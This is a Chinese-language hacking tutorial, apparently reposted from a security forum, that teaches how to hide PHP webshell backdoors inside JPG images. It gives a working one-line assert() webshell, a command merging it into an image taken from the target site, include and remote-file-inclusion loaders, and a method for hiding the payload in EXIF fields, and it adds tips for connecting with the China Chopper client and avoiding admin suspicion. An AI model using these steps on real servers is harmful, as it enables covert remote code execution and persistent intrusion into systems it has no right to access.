我们平时藏匿图片后门是什么流程呢?我们来看一下
1、建立一个eval.php文件,上面加入我们的后门:
1
|
<?php assert($_POST[feiji]);?>
|
2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。
3、合并图片和php后门:
1
|
Copy /b C:/xampp/htdocs/images/1.jpg + C:/xampp/htdocs/images/eval.php C:/xampp/htdocs/images/2.jpg
|
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
1
|
<?php include (‘2.jpg’); ?>
|
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问images.php页面出现乱码,但是后门已经正常运行:
但是一句话在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。
1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:
2、创建任何一个php文件中,以images.php为例,写入以下的代码:
1
|
<?php $filename=$_GET[‘feiji’];include ($filename); ?>
|
3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:
http://127.0.0.1/images/images.php?feiji=http://www.xxxx.com/images/2.jpg 密码为feiji
注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。
EXIF信息: 是可交换图像文件的缩写,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。所有的JPEG文件以字符串“0xFFD8”开头,并以字符串“0xFFD9”结束。文件头中有一系列“0xFF??”格式的字符串,称为“标识”,用来标记JPEG文件的信息段。“0xFFD8”表示图像信息开始,“0xFFD9”表示图像信息结束,这两个标识后面没有信息,而其它标识紧跟一些信息字符。
其实就是这个玩意儿:选定图片右键选择属性,在详细信息里面可以看到(win7)
1、php里面有一个函数exif_read_data(),可以取得图片的EXIF信息头,但是需要开启php_exif模块。
2、我们是可以随意修改EXIF信息的,例如:
这里推荐一个小工具,PowerExif ,下载地址为:
http://www.pc6.com/softview/SoftView_68705.html
免费版可以修改部分EXIF信息头,但是对我们来说已经足够了。
打开工具,点击添加,在修改机型信息,如下:
添加我们的PAYLOAD:
3、我们来调试一下:
1
2
3
4
5
6
7
|
<?
$exif = exif_read_data(’460.jpg’);
var_dump($exif);
?>
|
输出:
4、利用方法:
在php脚本上写入:
1
2
3
4
5
6
7
|
<?
$exif = exif_read_data (’460.jpg’);
assert($exif[‘Model’]);
?>
|
5、在菜刀上添加http://127.0.0.1/images/images.php 密码为feiji,效果:
有同学可能会问,为什么要使用这种方法藏匿图片后门,这个不是和初级的藏匿方法等效吗?原因有三:
【via@91ri.org团队】 未经授权,禁止转载!
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号